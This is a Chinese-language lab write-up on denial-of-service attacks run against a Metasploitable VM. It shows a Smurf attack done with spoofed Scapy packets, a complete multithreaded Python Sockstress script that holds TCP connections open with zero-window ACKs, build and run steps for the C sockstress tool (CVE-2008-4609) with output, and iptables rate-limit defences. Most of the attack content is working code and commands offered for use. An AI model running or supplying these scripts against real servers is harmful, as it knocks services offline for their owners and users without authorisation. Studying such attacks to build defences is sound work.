Smurf攻击 世界上最古老的DDoS攻击技术之一 - 向广播地址发送伪造源地址(源地址填为受害者)的ICMP echo request (ping) 包 - LAN内所有会应答广播ping的主机都向伪造的源地址(即受害者)返回echo reply,形成流量放大 - 对现代操作系统几乎无效:主机默认不响应目标为广播地址的ping(Linux 默认 net.ipv4.icmp_echo_ignore_broadcasts=1),路由器也默认不转发定向广播(RFC 2644) Scapy - i=IP() - i.dst="1.1.1.255" - p=ICMP() - p.display() - r=(i/p) - send(IP(dst="1.1.1.255",src="1.1.1.2")/ICMP(),count=100,verbose=1) |
msfadmin@metasploit:~$ ifconfig
192.168.1.119
root@K:~# scapy
WARNING: NO route found for IPV6 destination :: (no default route?)
welcome to Scapy (2.3.2)
>>> i=IP()
>>> i.src="192.168.1.119"
>>> i.dst="192.168.1.255"
>>> i.display()
###[ IP ]###
version= 4
ihl= None
tos= 0x0
len= None
id= 1
flags=
frag= 0
ttl= 64
proto= tcp
chksum= None
src= 192.168.1.119
dst= 192.168.1.255
\options\
>>> p=ICMP()
>>> p.display()
###[ ICMP ]###
type=echo-request
code=0
chksum=None
id=0x0
seq=0x0
>>> send(i/p)
.
Sent 1 packets
>>> r=send(i/p)
.
Sent 1 packets
>>> r.display()
Traceback (most recent call last):
File "<console>", line 1, in <module>
AttributeError: 'NoneType' object has no attribute 'display'
>>> send(IP(dst="1.1.1.255",src="1.1.1.2")/ICMP(),count=100,verbose=1)
msfadmin@metasploit:~$ sudo tcpdump -i eth0
Sockstress 2008年由Jack C. Louis发现 针对TCP服务的拒绝服务攻击 - 消耗被攻击目标的系统资源 - 与攻击目标建立大量socket连接 - 完成三次握手,最后的ACK包中 window 大小为0(客户端声明不接收数据,服务端只能保持连接并等待窗口打开) - 攻击者资源消耗小(CPU、内存、带宽) - 异步攻击,单机可拒绝服务高配资源服务器 - 利用的是TCP滑动窗口(window)流控机制 |
root@K:~# cp /media/sf_D_DRIVE/socketress.py .
----------------------------------------------------------------------
[sockstress.py]
#!/usr/bin/python
# -*- coding: utf-8 -*-
from scapy.all import *
from time import sleep
import logging
import os
import random
import signal
import socket
import subprocess
import sys
import thread
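logging.getLogger("scapy.runtime").setLevel(logging.ERROR)

# Command-line contract: <target IP> <port> <thread count>.
# Exit non-zero on a usage error so a calling shell can detect it.
if len(sys.argv) != 4:
    print("用法: ./sock_stress.py [目标IP] [端口] [线程数]")
    print("举例: ./sock_stress.py 10.0.0.5 21 20 ## 请确定呗攻击端口处于开放状态")
    sys.exit(1)

target = str(sys.argv[1])
dstport = int(sys.argv[2])
threads = int(sys.argv[3])

# `target` is later placed on an iptables command line: accept only a
# dotted-quad IPv4 address so no shell/option text can be smuggled in.
try:
    socket.inet_aton(target)
except socket.error:
    print("目标IP无效: " + target)
    sys.exit(1)

if not 0 < dstport < 65536:
    print("端口无效: " + str(dstport))
    sys.exit(1)

if threads < 1:
    print("线程数必须大于0")
    sys.exit(1)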
## 攻击函数
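def sockstress(target, dstport):
    """Worker loop: complete TCP handshakes against target:dstport, each
    advertising a zero receive window, so the server keeps the connection
    open without being able to send.

    Args:
        target:  victim IPv4 address (string).
        dstport: victim TCP port (int); should be open.

    Never returns; it is meant to run in a background thread and die with
    the process.  Failures of a single probe are skipped so one bad packet
    does not stop the worker.
    """
    while True:
        try:
            sport = random.randint(0, 65535)
            synack = sr1(IP(dst=target) / TCP(sport=sport, dport=dstport, flags='S'),
                         timeout=1, verbose=0)
            # No reply within the timeout, or not a SYN/ACK (e.g. a RST from
            # a closed port): there is no handshake to complete.
            if synack is None or TCP not in synack:
                continue
            if synack[TCP].flags & 0x12 != 0x12:
                continue
            # Third handshake packet: ack the server ISN+1, and use the seq
            # the server expects (its ack field) so the ACK is in-window.
            # window=0 is the whole point of the attack.
            send(IP(dst=target)
                 / TCP(sport=sport, dport=dstport, flags='A', window=0,
                       seq=synack[TCP].ack, ack=synack[TCP].seq + 1)
                 / '\x00\x00',
                 verbose=0)
        except Exception:
            # Best-effort: a malformed reply or socket error should not kill
            # the worker; try again with a fresh source port.
            pass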
## 停止攻击函数
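def shutdown(signal, frame):
    """SIGINT handler: remove the RST-dropping OUTPUT rule added at start-up
    and exit.

    Args:
        signal: signal number (standard handler argument, unused).
        frame:  interrupted stack frame (standard handler argument, unused).
    """
    print('正在恢复 iptables 规则')
    # Argument list, no shell: `target` is never parsed by /bin/sh.
    subprocess.call(['iptables', '-D', 'OUTPUT', '-p', 'tcp',
                     '--tcp-flags', 'RST', 'RST', '-d', target, '-j', 'DROP'])
    sys.exit()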
## 添加iptables规则
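# The handshake is forged from user space, so the attacker's kernel has no
# socket for these connections and would answer every SYN/ACK with a RST,
# tearing the connection down again.  Drop outbound RSTs to the target for
# the duration of the run (the C tool prints the same requirement).
# Argument list, no shell: `target` is never parsed by /bin/sh.
rc = subprocess.call(['iptables', '-A', 'OUTPUT', '-p', 'tcp',
                      '--tcp-flags', 'RST', 'RST', '-d', target, '-j', 'DROP'])
if rc != 0:
    # Without this rule the attack cannot hold connections open; usually
    # means we are not root.
    print("添加 iptables 规则失败 (需要 root 权限)")
    sys.exit(1)
signal.signal(signal.SIGINT, shutdown)

print("\n攻击正在进行...按 Ctrl+C 停止攻击")
for _ in range(threads):
    thread.start_new_thread(sockstress, (target, dstport))

# Keep the main thread alive so the SIGINT handler can run and restore the
# firewall; the workers never return.
while True:
    sleep(1)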
----------------------------------------------------------------------
root@K:~# ./sockstress.py
WARNING: No route found for IPV6 destination :: (no default route?)
用法: ./sock_stress.py [目标IP] [端口] [线程数]
举例: ./sock_stress.py 10.0.0.5 21 20 ## 请确定呗攻击端口处于开放状态
root@K:~# ./sockstress.py 192.168.1.119 21 200
WARNING: No route found for IPV6 destination :: (no default route?)
攻击正在进行...按 Ctrl+C 停止攻击
root@K:~# iptables -L
Chain INPUT (policy ACCEPT)
target prot opt source destination
Chain FORWARD (policy ACCEPT)
target prot opt source destination
Chain OUTPUT (policy ACCEPT)
target prot opt source destination
DROP tcp -- anywhere 192.168.1.119 tcp flags:RST/RST
root@K:~# ifconfig
192.168.1.116
root@K:~# ping 192.168.1.119
root@K:~# ifconfig
10.0.2.15
msfadmin@metasploit:~$ sudo netstat -pantu | grep ESTAB
msfadmin@metasploit:~$ sudo netstat -pantu | grep ESTAB | wc -l
654
msfadmin@metasploit:~$ free -m //内存使用量
root@K:~# nc 192.168.1.119 21
Sockstress Python 攻击脚本 - ./sockstress.py 1.1.1.1 21 200 C攻击脚本 - http://github.com/defuse/sockstress - gcc -Wall -c sockstress.c - gcc -pthread -o sockstress sockstress.o - ./sockstress 1.1.1.1:80 eth0 - ./sockstress 1.1.1.1:80 eth0 -p payloads/http 防火墙规则(必须) - iptables -A OUTPUT -p TCP --tcp-flags RST RST -d 1.1.1.1 -j DROP - 握手由工具在用户态伪造,攻击机内核没有对应的socket,收到SYN/ACK后会回RST把连接拆掉;只有丢弃发往目标的RST,连接才能停留在ESTABLISHED(对比下方加规则前 rst: 1333 与加规则后 rst: 0)。攻击结束后用 -D 删除该规则 |
root@K:~/sockstree-master# gcc -Wall -c sockstress.c
root@K:~/sockstree-master# gcc -pthread -o sockstress sockstress.o
root@K:~/sockstree-master# ./sockstress
SOCKSTRESS - CVE-2008-4609 | havoc@defuse.ca
[!] Too few arguments
Usage: ./sockstress <ip>:<port> <interface> [-p payload] [-d delay]
<ip> Victim IP address
<port> Victim port
<interface> Local network interface (e.g. eth0)
-p payload File containing data to send after connecting
Payload can be at most 1000 bytes
-d delay Microseconds between SYN packets (default: 10000)
-h Help menu
**You must configure your firewall to drop TCP reset packets sent to <ip>**
root@K:~/sockstree-master# ./sockstress 192.168.1.119:21 -p payloads/
dns_a dns_axfr http smtp
root@K:~/sockstree-master# ./sockstress 192.168.1.119:21 -p payloads/http
root@K:~/sockstree-master# cat payloads/
dns_a dns_axfr http smtp
root@K:~/sockstree-master# cat payloads/dns_axfr
root@K:~/sockstree-master# cat payloads/http
root@K:~/sockstree-master# cat payloads/smtp
HELO gmail.com
MAIL FROM: foo@gmail.com
RCPT TO: victiom@victim-domain.com
DATA
Subject: AAAAAAAAAAAAA
BBBBBBBBBBBBBBBBBBB
.
QUIT
root@K:~/sockstree-master# ./sockstress 192.168.1.119:21 -p payloads/http
SOCKSTRESS - CVE-2008-4609 | havoc@defuse.ca
[+] Sending packets from eth0 (192.168.1.116)
[+] Attacking: 192.168.1.119:80
^C SENT: syn: 1333 ack: 133 RECV: synack: 1333 ack: 0 rst: 1333
root@K:~/sockstree-master# iptables -A OUTPUT -p TCP --tcp-flags RST RST -d 192.168.1.119 -j DROP
root@K:~/sockstree-master# iptables -L
Chain INPUT (policy ACCEPT)
target prot opt source destination
Chain FORWARD (policy ACCEPT)
target prot opt source destination
Chain OUTPUT (policy ACCEPT)
target prot opt source destination
DROP tcp -- anywhere 192.168.1.119 tcp flags:RST/RST
root@K:~/sockstree-master# ./sockstress 192.168.1.119:21 -p payloads/http
SOCKSTRESS - CVE-2008-4609 | havoc@defuse.ca
[+] Sending packets from eth0 (192.168.1.116)
[+] Attacking: 192.168.1.119:80
[+] SENT: syn: 1333 ack: 133 RECV: synack: 1333 ack: 0 rst: 0
Sockstress 防御措施 - 直到今天sockstress攻击仍然是一种很有效的DoS攻击方式 - 由于完成了完整的TCP三次握手,因此SYN cookie防御无效 - 根本的防御方法是采用白名单(不实际) - 折中对策:限制单位时间内每个源IP新建的TCP连接数,例如封杀30秒内向80端口发起超过10次新连接的源IP: iptables -I INPUT -p tcp --dport 80 -m state --state NEW -m recent --set / iptables -I INPUT -p tcp --dport 80 -m state --state NEW -m recent --update --seconds 30 --hitcount 10 -j DROP (注意:-m recent 按源IP计数,NAT后面的多个正常用户共用一个出口IP时会被一起封掉;攻击从大量源IP分布式发起(DDoS)时以上规则无效) |
msfadmin@metasploit:~$ sudo iptables -I INPUT -p tcp --dport 80 -m state --state NEW -m recent --set
msfadmin@metasploit:~$ sudo iptables -I INPUT -p tcp --dport 80 -m state --state NEW -m recent --update --seconds 30 --hitcount 10 -j DROP